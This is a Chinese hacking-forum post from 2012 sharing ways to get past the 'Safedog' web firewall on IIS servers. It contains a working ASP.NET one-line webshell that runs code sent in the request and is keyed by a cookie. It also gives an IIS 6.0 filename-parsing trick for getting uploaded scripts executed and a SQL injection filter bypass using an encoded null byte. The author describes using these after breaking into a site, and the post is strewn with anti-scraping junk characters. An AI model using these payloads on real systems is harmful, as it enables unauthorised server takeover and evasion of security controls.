找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2175|回复: 0
打印 上一主题 下一主题

突破安全狗防注入及上传的一些思路

[复制链接]
跳转到指定楼层
楼主
发表于 2012-10-31 08:25:30 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
1、绕过IIS安全狗的一句话。3 t$ m( m2 X) I, R
前几天测试一个网站。找到突破口之后,写入webshell,但服务器上装有IIS安全狗,平时常用的一句话或者shell都用不了。下面这段.net一句话可以突破。" G7 F$ l9 e$ e, ]: {, M# h
<%@ Page Language="C#" ValidateRequest="false" %> <%try{System.Reflection.Assembly.Load(Request.BinaryRead(int.Parse(Request.Cookies["admin163.net"].Value))).CreateInstance("c", true, System.Reflection.BindingFlags.Default, null, new object[] { this }, null,null); } catch { }%>连接端用cncert的aspx一句话客户端。
, u* i5 O4 ^# z; J2 v
1 ], T/ o9 X* F% F2、IIS6.0解析漏洞遇到安全狗。
% q' @; J7 U9 S2 T5 k* P* a1 |文件名为" b! @# z6 B  T9 b9 ^
http://www.xxxxx.com/sh3llc0de.asp;1.jpg- n! J6 D; Z0 H# V: i, n
4 h# Y# F4 z5 `+ e7 @3 h0 M
这样的会被IIS安全狗果断屏蔽。$ O# ^4 \3 d3 b  y8 J1 K8 q
改成如下名称,IIS6一样会解析:
, y# @* U0 }; W! N* G: [' V* _www.xxxxx.com/;1.asp;1.jpg
, e; |5 _% n) k
; _( P+ d! O- ]8 w" `: W/ B0 L' ~/ E3、安全狗的注入绕过。
; \5 `9 C; I( N8 [% |6 L! t常用的如r00ts.asp?id=1 and 1=1 是会被安全狗屏蔽的。
3 M0 J7 D+ t) N: C但如果:: g$ ]- p1 P1 _$ v2 w
r00ts.asp?r00ts.com=%00.&id=69%20 and 1=1, F$ c) t( Z2 Y/ e
就可以成功绕过了。
1 ]' l/ K7 M( ]0 E, u7 s6 B/ b2 [3 j* R; j4 b+ ^- x
' Q9 i  x  O" i( h% R7 J' m9 M9 F8 p4 c
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表